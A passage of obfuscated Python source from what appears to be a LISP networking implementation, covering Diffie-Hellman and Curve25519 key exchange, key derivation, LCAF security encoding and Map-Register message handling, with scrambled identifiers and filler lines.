if 7 - 7: Ii1I / I1Ii111 % ooOoO0o - I1Ii111 * I1IiiI
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 18 - 18: oO0o - IiII % I11i * Ii1I
if 66 - 66: i1IIi - i1IIi - OOooOOo . I11i
def print_keys ( self , do_bold = True ) :
oOO0O00o0O0 = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
oOO0O00o0O0 += "none"
else :
oOO0O00o0O0 += self . print_key ( self . local_public_key )
if 25 - 25: i1IIi * I1IiiI - OoOoOO00 + oO0o
iiiI1I = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
iiiI1I += "none"
else :
iiiI1I += self . print_key ( self . remote_public_key )
if 74 - 74: iII111i / I1Ii111 / II111iiii - iII111i / oO0o % I11i
i1Iiiiii1II = "ECDH" if ( self . curve25519 ) else "DH"
i1iII1i = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( i1Iiiiii1II , i1iII1i , oOO0O00o0O0 , iiiI1I ) )
if 15 - 15: O0 % Oo0Ooo % IiII % OoooooooOO - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo * I1ii11iIi11i - I1IiiI
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 22 - 22: Oo0Ooo % OoooooooOO - Oo0Ooo - iII111i . Ii1I
if 100 - 100: II111iiii / I1Ii111 / iII111i - I1ii11iIi11i * iIii1I11I1II1
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 7 - 7: i1IIi . IiII % i11iIiiIii * I1ii11iIi11i . I11i % I1ii11iIi11i
III = self . local_private_key
Oo = self . dh_g_value
iIIiiIi = self . dh_p_value
return ( int ( ( Oo ** III ) % iIIiiIi ) )
if 35 - 35: I1IiiI
if 48 - 48: OoooooooOO % OoooooooOO - OoO0O00 . OoOoOO00
def compute_shared_key ( self , ed , print_shared = False ) :
III = self . local_private_key
I1i = self . remote_public_key
if 5 - 5: OoooooooOO
i1IIIiI1ii = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( i1IIIiI1ii , self . print_keys ( ) ) )
if 41 - 41: OoooooooOO
if ( self . curve25519 ) :
I1I111i = curve25519 . Public ( I1i )
self . shared_key = self . curve25519 . get_shared_key ( I1I111i )
else :
iIIiiIi = self . dh_p_value
self . shared_key = ( I1i ** III ) % iIIiiIi
if 63 - 63: I1ii11iIi11i . I1IiiI + OOooOOo - IiII + iII111i
if 78 - 78: Ii1I
if 29 - 29: II111iiii
if 79 - 79: iIii1I11I1II1 - i11iIiiIii + ooOoO0o - II111iiii . iIii1I11I1II1
if 84 - 84: Oo0Ooo % I11i * O0 * I11i
if 66 - 66: OOooOOo / iIii1I11I1II1 - OoOoOO00 % O0 . ooOoO0o
if 12 - 12: Oo0Ooo + I1IiiI
if ( print_shared ) :
o00oOOo0Oo = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( o00oOOo0Oo ) )
if 37 - 37: i1IIi * i11iIiiIii
if 95 - 95: i11iIiiIii % I1Ii111 * Oo0Ooo + i1IIi . O0 + I1ii11iIi11i
if 7 - 7: OoO0O00 * i11iIiiIii * iIii1I11I1II1 / OOooOOo / I1Ii111
if 35 - 35: iII111i * OOooOOo
if 65 - 65: II111iiii % i1IIi
self . compute_encrypt_icv_keys ( )
if 13 - 13: OoO0O00 * I1Ii111 + Oo0Ooo - IiII
if 31 - 31: OoO0O00
if 68 - 68: OoO0O00 + i1IIi / iIii1I11I1II1 + II111iiii * iIii1I11I1II1 + I1ii11iIi11i
if 77 - 77: i11iIiiIii - I1Ii111 . I1ii11iIi11i % Oo0Ooo . Ii1I
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 9 - 9: o0oOOo0O0Ooo
if 55 - 55: OOooOOo % iIii1I11I1II1 + I11i . ooOoO0o
def compute_encrypt_icv_keys ( self ) :
ooOo = hashlib . sha256
if ( self . curve25519 ) :
iiooo0o0oO = self . shared_key
else :
iiooo0o0oO = lisp_hex_string ( self . shared_key )
if 19 - 19: Oo0Ooo - OoO0O00 + i11iIiiIii / iIii1I11I1II1
if 1 - 1: IiII % i1IIi
if 41 - 41: OoO0O00 * OoO0O00 / iII111i + I1ii11iIi11i . o0oOOo0O0Ooo
if 84 - 84: i11iIiiIii + OoO0O00 * I1IiiI + I1ii11iIi11i / Ii1I
if 80 - 80: I1ii11iIi11i
oOO0O00o0O0 = self . local_public_key
if ( type ( oOO0O00o0O0 ) != int ) : oOO0O00o0O0 = int ( binascii . hexlify ( oOO0O00o0O0 ) , 16 )
iiiI1I = self . remote_public_key
if ( type ( iiiI1I ) != int ) : iiiI1I = int ( binascii . hexlify ( iiiI1I ) , 16 )
ooOOO = "0001" + "lisp-crypto" + lisp_hex_string ( oOO0O00o0O0 ^ iiiI1I ) + "0100"
if 95 - 95: I11i
Oooo0o0oOO000O = hmac . new ( ooOOO . encode ( ) , iiooo0o0oO , ooOo ) . hexdigest ( )
Oooo0o0oOO000O = int ( Oooo0o0oOO000O , 16 )
if 61 - 61: oO0o - I1ii11iIi11i / iII111i % I1ii11iIi11i + OoO0O00 / Oo0Ooo
if 10 - 10: i11iIiiIii / OoOoOO00
if 27 - 27: I1IiiI / OoooooooOO
if 74 - 74: I1ii11iIi11i % I1Ii111 - OoO0O00 * I11i . OoooooooOO * OoO0O00
OOOooooOo0 = ( Oooo0o0oOO000O >> 128 ) & LISP_16_128_MASK
o000o00OO00Oo = Oooo0o0oOO000O & LISP_16_128_MASK
OOOooooOo0 = lisp_hex_string ( OOOooooOo0 ) . zfill ( 32 )
self . encrypt_key = OOOooooOo0 . encode ( )
I1II11I11111i = 32 if self . do_poly else 40
o000o00OO00Oo = lisp_hex_string ( o000o00OO00Oo ) . zfill ( I1II11I11111i )
self . icv_key = o000o00OO00Oo . encode ( )
if 14 - 14: IiII + o0oOOo0O0Ooo + I1ii11iIi11i * o0oOOo0O0Ooo + OoO0O00
if 2 - 2: II111iiii % i11iIiiIii
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
i11 = self . icv . poly1305aes
iiIii11I1 = self . icv . binascii . hexlify
nonce = iiIii11I1 ( nonce )
oo0O000OooO0 = i11 ( self . encrypt_key , self . icv_key , nonce , packet )
if ( lisp_is_python2 ( ) ) :
oo0O000OooO0 = iiIii11I1 ( oo0O000OooO0 . encode ( "raw_unicode_escape" ) )
else :
oo0O000OooO0 = iiIii11I1 ( oo0O000OooO0 ) . decode ( )
if 26 - 26: OoO0O00 % i11iIiiIii + oO0o * II111iiii / IiII
else :
III = binascii . unhexlify ( self . icv_key )
oo0O000OooO0 = hmac . new ( III , packet , self . icv ) . hexdigest ( )
oo0O000OooO0 = oo0O000OooO0 [ 0 : 40 ]
if 70 - 70: Oo0Ooo / I1Ii111 . IiII - OOooOOo
return ( oo0O000OooO0 )
if 65 - 65: IiII - I1Ii111
if 71 - 71: Oo0Ooo - i1IIi
def add_key_by_nonce ( self , nonce ) :
if ( nonce not in lisp_crypto_keys_by_nonce ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 27 - 27: OoOoOO00 . O0 / I1ii11iIi11i . iIii1I11I1II1
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 15 - 15: Ii1I + OoO0O00 % iIii1I11I1II1 - I1ii11iIi11i - i1IIi % o0oOOo0O0Ooo
if 54 - 54: IiII - II111iiii . ooOoO0o + Ii1I
def delete_key_by_nonce ( self , nonce ) :
if ( nonce not in lisp_crypto_keys_by_nonce ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
def add_key_by_rloc ( self , addr_str , encap ) :
O0ooOo = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 34 - 34: OoooooooOO . II111iiii * iIii1I11I1II1 / O0 . I1IiiI
if 4 - 4: i11iIiiIii / I1ii11iIi11i
if ( addr_str not in O0ooOo ) :
O0ooOo [ addr_str ] = [ None , None , None , None ]
if 41 - 41: Ii1I
O0ooOo [ addr_str ] [ self . key_id ] = self
if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
if 47 - 47: O0 . o0oOOo0O0Ooo / Ii1I * iII111i
if 63 - 63: I1Ii111 - oO0o - iII111i - ooOoO0o / oO0o + OoO0O00
if 94 - 94: IiII / I1IiiI . II111iiii
if 32 - 32: oO0o . OOooOOo % OOooOOo . OoOoOO00
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , O0ooOo [ addr_str ] )
if 37 - 37: OOooOOo + O0 + OOooOOo . iII111i . o0oOOo0O0Ooo
if 78 - 78: I1IiiI / I11i + o0oOOo0O0Ooo . Oo0Ooo / O0
if 49 - 49: I1ii11iIi11i
def encode_lcaf ( self , rloc_addr ) :
oOO = self . normalize_pub_key ( self . local_public_key )
iI111I = self . key_length ( oOO )
i1iiII1I1I1ii = ( 6 + iI111I + 2 )
if ( rloc_addr != None ) : i1iiII1I1I1ii += rloc_addr . addr_length ( )
if 23 - 23: i11iIiiIii % IiII . Ii1I + Ii1I * IiII
Oo00oo = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( i1iiII1I1I1ii ) , 1 , 0 )
if 19 - 19: O0 % I1IiiI + oO0o
if 23 - 23: OOooOOo
if 68 - 68: OoooooooOO
if 18 - 18: Ii1I * OoO0O00
if 89 - 89: OoO0O00 + oO0o % iIii1I11I1II1 + I11i / O0
if 38 - 38: ooOoO0o - o0oOOo0O0Ooo - O0 + ooOoO0o % OoOoOO00 . o0oOOo0O0Ooo
i1iII1i = self . cipher_suite
Oo00oo += struct . pack ( "BBH" , i1iII1i , 0 , socket . htons ( iI111I ) )
if 40 - 40: iIii1I11I1II1 * OoooooooOO * I1Ii111 - Ii1I + i11iIiiIii
if 81 - 81: OoO0O00 * OoooooooOO / iII111i
if 8 - 8: O0 * i1IIi - OoOoOO00 % I1IiiI / I1ii11iIi11i
if 39 - 39: I1ii11iIi11i . oO0o * II111iiii + I1IiiI - iIii1I11I1II1
for iIi1iIIIiIiI in range ( 0 , iI111I * 2 , 16 ) :
III = int ( oOO [ iIi1iIIIiIiI : iIi1iIIIiIiI + 16 ] , 16 )
Oo00oo += struct . pack ( "Q" , byte_swap_64 ( III ) )
if 56 - 56: IiII - Ii1I + i11iIiiIii * OoO0O00 % I1IiiI
if 37 - 37: iIii1I11I1II1 + IiII / I1Ii111 . OoooooooOO
if 72 - 72: oO0o % ooOoO0o % OOooOOo
if 63 - 63: OoO0O00 . Ii1I % II111iiii / I11i - OoOoOO00
if 4 - 4: Oo0Ooo - O0 / I11i + O0 - oO0o * Oo0Ooo
if ( rloc_addr ) :
Oo00oo += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
Oo00oo += rloc_addr . pack_address ( )
if 25 - 25: I1IiiI
return ( Oo00oo )
if 64 - 64: oO0o
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
def decode_lcaf ( self , packet , lcaf_len ) :
if 63 - 63: IiII * i11iIiiIii
if 86 - 86: I11i % I11i - OoOoOO00 + I1Ii111 / I1IiiI * OoooooooOO
if 26 - 26: II111iiii * iII111i + o0oOOo0O0Ooo / O0 + i1IIi - I11i
if 56 - 56: OOooOOo
if ( lcaf_len == 0 ) :
iiII1iiI = "HHBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 76 - 76: i1IIi % iIii1I11I1II1 - o0oOOo0O0Ooo + IiII - I11i
i1I1iiiI , OOOo00o , ooOoOoOo , OOOo00o , lcaf_len = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 9 - 9: I11i - II111iiii + I1Ii111 / oO0o % I1ii11iIi11i
if 17 - 17: iIii1I11I1II1 - ooOoO0o
if ( ooOoOoOo != LISP_LCAF_SECURITY_TYPE ) :
packet = packet [ lcaf_len + 6 : : ]
return ( packet )
if 99 - 99: Oo0Ooo + I1Ii111 % ooOoO0o - o0oOOo0O0Ooo
lcaf_len = socket . ntohs ( lcaf_len )
packet = packet [ ooo0000oo0 : : ]
if 52 - 52: I1ii11iIi11i
if 93 - 93: iII111i . i11iIiiIii
if 24 - 24: OOooOOo . OoO0O00 + I1Ii111 . oO0o - I1ii11iIi11i % iII111i
if 49 - 49: O0 . Oo0Ooo / Ii1I
if 29 - 29: I1ii11iIi11i / oO0o * O0 - i11iIiiIii - OoO0O00 + Ii1I
if 86 - 86: I1IiiI / I1ii11iIi11i * Ii1I % i11iIiiIii
ooOoOoOo = LISP_LCAF_SECURITY_TYPE
iiII1iiI = "BBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 20 - 20: iII111i . OoooooooOO + iII111i + ooOoO0o * I1ii11iIi11i
i1IIiiI1iii1 , OOOo00o , i1iII1i , OOOo00o , iI111I = struct . unpack ( iiII1iiI ,
packet [ : ooo0000oo0 ] )
if 100 - 100: iII111i / o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i * OoOoOO00 % i11iIiiIii - Ii1I
if 77 - 77: II111iiii - o0oOOo0O0Ooo . I1ii11iIi11i
if 63 - 63: oO0o
if 79 - 79: I1ii11iIi11i - oO0o - o0oOOo0O0Ooo . OOooOOo
if 65 - 65: i11iIiiIii . OoO0O00 % iII111i + IiII - i11iIiiIii
packet = packet [ ooo0000oo0 : : ]
iI111I = socket . ntohs ( iI111I )
if ( len ( packet ) < iI111I ) : return ( None )
if 60 - 60: I1Ii111
if 14 - 14: Oo0Ooo % oO0o * iII111i - i11iIiiIii / I1ii11iIi11i * i11iIiiIii
if 95 - 95: iIii1I11I1II1 + OoOoOO00 . I1IiiI + OoOoOO00 * I11i + OOooOOo
if 14 - 14: Ii1I - O0
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM , LISP_CS_25519_CHACHA ,
LISP_CS_1024 ]
if ( i1iII1i not in OoOO0Ooo ) :
lprint ( "Cipher-suites {} supported, received {}" . format ( OoOO0Ooo ,
i1iII1i ) )
packet = packet [ iI111I : : ]
return ( packet )
if 95 - 95: OoO0O00 - IiII % I1Ii111
if 27 - 27: iIii1I11I1II1 / I1IiiI % OoOoOO00 / I1IiiI * Ii1I
self . cipher_suite = i1iII1i
if 13 - 13: iII111i . iII111i + i11iIiiIii % O0 % I1Ii111 + IiII
if 42 - 42: i1IIi + iII111i . OoooooooOO + I1ii11iIi11i . I11i / Ii1I
if 1 - 1: o0oOOo0O0Ooo
if 95 - 95: OOooOOo / i1IIi % OoO0O00 . I1Ii111 + I1Ii111
if 80 - 80: O0 + I1ii11iIi11i + OOooOOo
oOO = 0
for iIi1iIIIiIiI in range ( 0 , iI111I , 8 ) :
III = byte_swap_64 ( struct . unpack ( "Q" , packet [ iIi1iIIIiIiI : iIi1iIIIiIiI + 8 ] ) [ 0 ] )
oOO <<= 64
oOO |= III
if 95 - 95: I1ii11iIi11i
self . remote_public_key = oOO
if 98 - 98: IiII * iII111i . OoooooooOO . O0
if 89 - 89: iII111i / O0 % OoooooooOO - O0 . OoO0O00
if 32 - 32: ooOoO0o
if 26 - 26: O0 * Ii1I - I1IiiI - iII111i / iIii1I11I1II1
if 57 - 57: I1ii11iIi11i - OoO0O00 * iIii1I11I1II1
if ( self . curve25519 ) :
III = lisp_hex_string ( self . remote_public_key )
III = III . zfill ( 64 )
II111IiI11i = b""
for iIi1iIIIiIiI in range ( 0 , len ( III ) , 2 ) :
OoiIiiIi11 = int ( III [ iIi1iIIIiIiI : iIi1iIIIiIiI + 2 ] , 16 )
II111IiI11i += lisp_store_byte ( OoiIiiIi11 )
if 73 - 73: IiII - IiII / OoooooooOO
self . remote_public_key = II111IiI11i
if 53 - 53: o0oOOo0O0Ooo / OoO0O00 . OoooooooOO
if 55 - 55: IiII * o0oOOo0O0Ooo * ooOoO0o - i1IIi / Ii1I * oO0o
packet = packet [ iI111I : : ]
return ( packet )
if 85 - 85: i11iIiiIii . OoO0O00 + OoO0O00
if 28 - 28: Oo0Ooo
if 62 - 62: Oo0Ooo + OoooooooOO / iII111i
if 60 - 60: Ii1I / OoOoOO00 . I11i % OOooOOo
if 61 - 61: O0 . Ii1I . O0 * i11iIiiIii * II111iiii / I1Ii111
if 69 - 69: I11i
if 17 - 17: I11i
if 38 - 38: I1Ii111 % OOooOOo
if 9 - 9: O0 . iIii1I11I1II1
def lisp_store_byte_py2 ( byte ) :
return ( chr ( byte ) )
if 44 - 44: I1ii11iIi11i % IiII
def lisp_store_byte_py3 ( byte ) :
return ( bytes ( [ byte ] ) )
if 6 - 6: OoO0O00
if 82 - 82: iIii1I11I1II1 . I11i / IiII / OOooOOo * II111iiii % oO0o
lisp_store_byte = lisp_store_byte_py2
if ( lisp_is_python3 ( ) ) : lisp_store_byte = lisp_store_byte_py3
if 62 - 62: II111iiii
if 96 - 96: I11i % OoOoOO00 * I1ii11iIi11i
if 94 - 94: Oo0Ooo - i1IIi . O0 % Oo0Ooo . ooOoO0o
if 63 - 63: i11iIiiIii % I1ii11iIi11i % I1IiiI . IiII * o0oOOo0O0Ooo + OOooOOo
if 77 - 77: o0oOOo0O0Ooo
if 63 - 63: ooOoO0o * oO0o + ooOoO0o * Ii1I + Oo0Ooo / I1ii11iIi11i
class lisp_thread ( object ) :
def __init__ ( self , name ) :
self . thread_name = name
self . thread_number = - 1
self . number_of_pcap_threads = 0
self . number_of_worker_threads = 0
self . input_queue = queue . Queue ( )
self . input_stats = lisp_stats ( )
self . lisp_packet = lisp_packet ( None )
if 15 - 15: O0 . I1ii11iIi11i * I1ii11iIi11i
if 65 - 65: I1Ii111 + O0 % o0oOOo0O0Ooo
if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
if 69 - 69: OOooOOo * II111iiii - ooOoO0o - i1IIi + i11iIiiIii
if 50 - 50: OoooooooOO * i1IIi / oO0o
if 83 - 83: i1IIi
if 38 - 38: OoooooooOO * iIii1I11I1II1
if 54 - 54: OoooooooOO . I1Ii111
if 71 - 71: Ii1I
if 31 - 31: I11i . i11iIiiIii . OoO0O00 * Oo0Ooo % Ii1I . o0oOOo0O0Ooo
if 92 - 92: OoooooooOO / O0 * i1IIi + iIii1I11I1II1
if 93 - 93: ooOoO0o % I1Ii111
if 46 - 46: I1ii11iIi11i * OoOoOO00 * IiII * I1ii11iIi11i . I1ii11iIi11i
if 43 - 43: ooOoO0o . i1IIi
if 68 - 68: IiII % Oo0Ooo . O0 - OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 45 - 45: I1IiiI
if 17 - 17: OoooooooOO - ooOoO0o + Ii1I . OoooooooOO % Oo0Ooo
if 92 - 92: I1Ii111 - OOooOOo % OoO0O00 - o0oOOo0O0Ooo % i1IIi
class lisp_control_header ( object ) :
def __init__ ( self ) :
self . type = 0
self . record_count = 0
self . nonce = 0
self . rloc_probe = False
self . smr_bit = False
self . smr_invoked_bit = False
self . ddt_bit = False
self . to_etr = False
self . to_ms = False
self . info_reply = False
if 38 - 38: I1ii11iIi11i . I11i / OoOoOO00 % I11i
if 10 - 10: O0 . I1IiiI * o0oOOo0O0Ooo / iII111i
def decode ( self , packet ) :
iiII1iiI = "BBBBQ"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( False )
if 61 - 61: Oo0Ooo - I1Ii111
O0o0oooOo0oo , OO0oOooo , ii1I , self . record_count , self . nonce = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 11 - 11: Oo0Ooo * OoooooooOO - i11iIiiIii
if 13 - 13: i11iIiiIii . O0 / OOooOOo * i1IIi
self . type = O0o0oooOo0oo >> 4
if ( self . type == LISP_MAP_REQUEST ) :
self . smr_bit = True if ( O0o0oooOo0oo & 0x01 ) else False
self . rloc_probe = True if ( O0o0oooOo0oo & 0x02 ) else False
self . smr_invoked_bit = True if ( OO0oOooo & 0x40 ) else False
if 14 - 14: IiII + IiII . I11i / Ii1I . iIii1I11I1II1
if ( self . type == LISP_ECM ) :
self . ddt_bit = True if ( O0o0oooOo0oo & 0x04 ) else False
self . to_etr = True if ( O0o0oooOo0oo & 0x02 ) else False
self . to_ms = True if ( O0o0oooOo0oo & 0x01 ) else False
if 10 - 10: II111iiii . OOooOOo / iII111i
if ( self . type == LISP_NAT_INFO ) :
self . info_reply = True if ( O0o0oooOo0oo & 0x08 ) else False
if 35 - 35: iII111i / Oo0Ooo + O0 * iIii1I11I1II1 - O0
return ( True )
if 3 - 3: I1ii11iIi11i
if 42 - 42: I11i % Oo0Ooo + IiII - I11i . iIii1I11I1II1 - Ii1I
def is_info_request ( self ) :
return ( ( self . type == LISP_NAT_INFO and self . is_info_reply ( ) == False ) )
if 27 - 27: iII111i % Oo0Ooo . I1ii11iIi11i . i1IIi % OoOoOO00 . o0oOOo0O0Ooo
if 37 - 37: iII111i + I1Ii111 * Ii1I + IiII
def is_info_reply ( self ) :
return ( True if self . info_reply else False )
if 39 - 39: O0 * Oo0Ooo - I1IiiI + Ii1I / II111iiii
if 66 - 66: ooOoO0o + oO0o % OoooooooOO
def is_rloc_probe ( self ) :
return ( True if self . rloc_probe else False )
if 23 - 23: oO0o . OoOoOO00 + iIii1I11I1II1
if 17 - 17: IiII
def is_smr ( self ) :
return ( True if self . smr_bit else False )
if 12 - 12: i1IIi . OoO0O00
if 14 - 14: OOooOOo + II111iiii % OOooOOo . oO0o * ooOoO0o
def is_smr_invoked ( self ) :
return ( True if self . smr_invoked_bit else False )
if 54 - 54: ooOoO0o * I11i - I1Ii111
if 15 - 15: iII111i / O0
def is_ddt ( self ) :
return ( True if self . ddt_bit else False )
if 61 - 61: i1IIi / i1IIi + ooOoO0o . I1Ii111 * ooOoO0o
if 19 - 19: o0oOOo0O0Ooo . II111iiii / i1IIi
def is_to_etr ( self ) :
return ( True if self . to_etr else False )
if 82 - 82: O0 / iII111i * OoO0O00 - I11i + Oo0Ooo
if 47 - 47: I1ii11iIi11i * I1IiiI / I1ii11iIi11i + Ii1I * II111iiii
def is_to_ms ( self ) :
return ( True if self . to_ms else False )
if 78 - 78: I1Ii111 - i1IIi + OoOoOO00 + Oo0Ooo * I1ii11iIi11i * o0oOOo0O0Ooo
if 97 - 97: i1IIi
if 29 - 29: I1IiiI
if 37 - 37: I1ii11iIi11i * I1Ii111 * I1IiiI * O0
if 35 - 35: I1IiiI - I1ii11iIi11i * iII111i + IiII / i1IIi
if 46 - 46: Oo0Ooo . ooOoO0o % Oo0Ooo / II111iiii * ooOoO0o * OOooOOo
if 59 - 59: I1Ii111 * iII111i
if 31 - 31: I11i / O0
if 57 - 57: i1IIi % ooOoO0o
if 69 - 69: o0oOOo0O0Ooo
if 69 - 69: I1Ii111
if 83 - 83: iIii1I11I1II1 . o0oOOo0O0Ooo + I1Ii111 . OoooooooOO / ooOoO0o + II111iiii
if 90 - 90: Ii1I * iII111i / OOooOOo
if 68 - 68: OoOoOO00
if 65 - 65: oO0o
if 82 - 82: o0oOOo0O0Ooo
if 80 - 80: i1IIi % OoOoOO00 + OoO0O00 - OoooooooOO / iIii1I11I1II1 + I1Ii111
if 65 - 65: Ii1I
if 71 - 71: I1Ii111 % I1Ii111 . oO0o + i11iIiiIii - i11iIiiIii
if 16 - 16: iIii1I11I1II1 / I1IiiI / I1Ii111 - i11iIiiIii . ooOoO0o / OOooOOo
if 13 - 13: o0oOOo0O0Ooo % O0 - I1Ii111 * OoooooooOO / Oo0Ooo - OoooooooOO
if 78 - 78: oO0o % OoooooooOO
if 73 - 73: I1IiiI % ooOoO0o % IiII + i1IIi - OoooooooOO / oO0o
if 78 - 78: OoooooooOO % oO0o - i11iIiiIii
if 37 - 37: IiII % Ii1I % i1IIi
if 23 - 23: ooOoO0o - O0 + i11iIiiIii
if 98 - 98: OoooooooOO
if 61 - 61: o0oOOo0O0Ooo . IiII . O0 + OoooooooOO + O0
if 65 - 65: i1IIi * OOooOOo * OoooooooOO - IiII . iII111i - OoO0O00
if 71 - 71: Ii1I * OoOoOO00
if 33 - 33: i1IIi . i1IIi * OoooooooOO % I1Ii111 * o0oOOo0O0Ooo
if 64 - 64: ooOoO0o / ooOoO0o + I1ii11iIi11i * OOooOOo % OOooOOo
if 87 - 87: OoO0O00 * Oo0Ooo
if 83 - 83: i1IIi * I1Ii111 - IiII / Ii1I
if 48 - 48: oO0o . II111iiii - OoOoOO00 % i1IIi . OoOoOO00
if 32 - 32: Ii1I * I1IiiI - OOooOOo . Oo0Ooo / O0 + Ii1I
if 67 - 67: OoOoOO00 % Oo0Ooo
if 7 - 7: i11iIiiIii % I1ii11iIi11i / I1Ii111 % Oo0Ooo - OoO0O00
if 73 - 73: I1ii11iIi11i
if 92 - 92: i11iIiiIii + O0 * I11i
if 60 - 60: o0oOOo0O0Ooo / Oo0Ooo
if 19 - 19: iIii1I11I1II1 . OoO0O00 / OoooooooOO
if 2 - 2: O0 - O0 % I1Ii111 / I1ii11iIi11i
if 76 - 76: OoO0O00 * oO0o - OoO0O00
if 57 - 57: OoooooooOO / OoOoOO00 + oO0o . Ii1I
if 14 - 14: i11iIiiIii % OOooOOo * o0oOOo0O0Ooo * OoOoOO00
if 55 - 55: I1Ii111 * OOooOOo * I1Ii111
if 70 - 70: O0 . Ii1I
if 33 - 33: OOooOOo * Ii1I
class lisp_map_register ( object ) :
def __init__ ( self ) :
self . proxy_reply_requested = False
self . lisp_sec_present = False
self . xtr_id_present = False
self . map_notify_requested = False
self . mobile_node = False
self . merge_register_requested = False
self . use_ttl_for_timeout = False
self . map_register_refresh = False
self . record_count = 0
self . nonce = 0
self . alg_id = 0
self . key_id = 0
self . auth_len = 0
self . auth_data = 0
self . xtr_id = 0
self . site_id = 0
self . record_count = 0
self . sport = 0
self . encrypt_bit = 0
self . encryption_key_id = None
if 64 - 64: i11iIiiIii . iIii1I11I1II1
if 7 - 7: OoOoOO00 % ooOoO0o + OoOoOO00 - OoOoOO00 * i11iIiiIii % OoO0O00
def print_map_register ( self ) :
oOOOOOo0OO0o0oOO0 = lisp_hex_string ( self . xtr_id )
if 48 - 48: I11i
IiiiI1 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}" )
if 98 - 98: ooOoO0o - iIii1I11I1II1 + OOooOOo - iIii1I11I1II1
lprint ( IiiiI1 . format ( bold ( "Map-Register" , False ) , "P" if self . proxy_reply_requested else "p" ,
# i1IIi / I1ii11iIi11i % OoooooooOO % OoooooooOO + OoooooooOO
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_ttl_for_timeout else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node else "m" ,
"N" if self . map_notify_requested else "n" ,
"F" if self . map_register_refresh else "f" ,
"E" if self . encrypt_bit else "e" ,
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oOOOOOo0OO0o0oOO0 , self . site_id ) )
if 42 - 42: ooOoO0o / IiII
if 62 - 62: I1ii11iIi11i - I1IiiI - I1Ii111 + OoO0O00 + I1IiiI / II111iiii
if 91 - 91: I1IiiI % O0 / oO0o * I1Ii111 + Ii1I - i1IIi
if 71 - 71: OoOoOO00 / IiII / II111iiii * OOooOOo - I1ii11iIi11i - iIii1I11I1II1
def encode ( self ) :
iIiIii = ( LISP_MAP_REGISTER << 28 ) | self . record_count
if ( self . proxy_reply_requested ) : iIiIii |= 0x08000000
if ( self . lisp_sec_present ) : iIiIii |= 0x04000000
if ( self . xtr_id_present ) : iIiIii |= 0x02000000
if ( self . map_register_refresh ) : iIiIii |= 0x1000
if ( self . use_ttl_for_timeout ) : iIiIii |= 0x800
if ( self . merge_register_requested ) : iIiIii |= 0x400
if ( self . mobile_node ) : iIiIii |= 0x200
if ( self . map_notify_requested ) : iIiIii |= 0x100
if ( self . encryption_key_id != None ) :
iIiIii |= 0x2000
iIiIii |= self . encryption_key_id << 14
if 5 - 5: oO0o + OoOoOO00
if 94 - 94: o0oOOo0O0Ooo % o0oOOo0O0Ooo % II111iiii * iIii1I11I1II1 / IiII . I1ii11iIi11i
if 13 - 13: OoOoOO00 . I1IiiI . o0oOOo0O0Ooo * oO0o / Ii1I
if 38 - 38: IiII - i1IIi . i11iIiiIii
if 28 - 28: I1Ii111 / oO0o . I1ii11iIi11i
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . auth_len = 0
else :
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
self . auth_len = LISP_SHA1_160_AUTH_DATA_LEN
if 83 - 83: I11i
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
self . auth_len = LISP_SHA2_256_AUTH_DATA_LEN
if 36 - 36: iIii1I11I1II1
if 74 - 74: IiII * I1ii11iIi11i - OoooooooOO
